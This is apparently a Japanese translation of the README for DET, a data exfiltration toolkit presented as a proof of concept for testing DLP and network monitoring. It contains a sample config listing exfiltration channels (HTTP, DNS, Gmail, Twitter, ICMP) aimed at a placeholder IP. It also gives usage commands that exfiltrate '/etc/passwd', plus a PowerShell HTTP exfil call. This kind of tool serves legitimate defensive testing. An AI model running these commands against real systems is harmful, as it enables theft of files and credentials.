
(拡張可能な) データ流出ツールキット (DET)
DET(AS IS で提供)は、単一または複数のチャネルを同時に使用してデータ漏洩を実行するための概念実証です。
これは、潜在的な DLP の欠陥を特定するための概念実証です。機密データや実際のデータ(評価中など)を漏洩させるために使用してはなりません。
アイデアは、さまざまなデータ漏洩技術に対して、実装されたネットワーク監視およびデータ漏洩防止(DLP)ソリューションの構成をテストするための、任意のプロトコル/サービスをプラグイン可能な汎用ツールキットを作成することでした。
プライマリリポジトリはこちらに移動しました。
DET は、2016年3月9日に BSides Ljubljana で発表されました。スライドはこちらで入手可能になります。 スライドはこちらから入手できます。
リポジトリをクローンします:
git clone https://github.com/sensepost/DET.git
その後:
pip install -r requirements.txt --user
DET を使用するには、設定を行い、適切な設定(例: SMTP/IMAP、AES256 暗号化パスフレーズなど)を追加する必要があります。設定ファイルの例が提供されており、config-sample.json という名前です。
{
"plugins": {
"http": {
"target": "192.168.1.101",
"port": 8080
},
"google_docs": {
"target": "192.168.1.101",
"port": 8080,
},
"dns": {
"key": "google.com",
"target": "192.168.1.101",
"port": 53
},
"gmail": {
"username": "[email protected]",
"password": "ReallyStrongPassword",
"server": "smtp.gmail.com",
"port": 587
},
"tcp": {
"target": "192.168.1.101",
"port": 6969
},
"udp": {
"target": "192.168.1.101",
"port": 6969
},
"twitter": {
"username": "PaulWebSec",
"CONSUMER_TOKEN": "XXXXXXXXX",
"CONSUMER_SECRET": "XXXXXXXXX",
"ACCESS_TOKEN": "XXXXXXXXX",
"ACCESS_TOKEN_SECRET": "XXXXXXXXX"
},
"icmp": {
"target": "192.168.1.101"
}
},
"AES_KEY": "THISISACRAZYKEY",
"sleep_time": 10
}
python det.py -h
usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]
[-L]
Data Exfiltration Toolkit (SensePost)
optional arguments:
-h, --help show this help message and exit
-c CONFIG Configuration file (eg. '-c ./config-sample.json')
-f FILE File to exfiltrate (eg. '-f /etc/passwd')
-d FOLDER Folder to exfiltrate (eg. '-d /etc/')
-p PLUGIN Plugins to use (eg. '-p dns,twitter')
-e EXCLUDE Plugins to exclude (eg. '-e gmail,icmp')
-L Server mode
すべてのプラグインをロードする場合:
python det.py -L -c ./config.json
Twitter と Gmail モジュールのみをロードする場合:
python det.py -L -c ./config.json -p twitter,gmail
すべてのプラグインをロードし、DNS を除外する場合:
python det.py -L -c ./config.json -e dns
すべてのプラグインをロードする場合:
python det.py -c ./config.json -f /etc/passwd
Twitter と Gmail モジュールのみをロードする場合:
python det.py -c ./config.json -p twitter,gmail -f /etc/passwd
すべてのプラグインをロードし、DNS を除外する場合:
python det.py -c ./config.json -e dns -f /etc/passwd
PowerShell の場合(HTTP モジュール):
PS C:\Users\user01\Desktop>
PS C:\Users\user01\Desktop> . .\http_exfil.ps1
PS C:\Users\user01\Desktop> HTTP-exfil 'C:\path\to\file.exe'
現在、DET は以下の複数のプロトコルをサポートしています:
およびその他の「サービス」:
現在、新しいモジュールの実装を進めており、まもなくリリース予定です。含まれるもの:
私がインスピレーションを得た素晴らしいプロジェクトへの参考/クレジット:
Twitter で @PaulWebSec までご連絡ください。 貢献したい場合は、自由にクローン、フォーク、PR を送信してください。
DET は MIT License の下でライセンスされています。 このライセンスの範囲を超える許可については、[email protected] までお問い合わせください。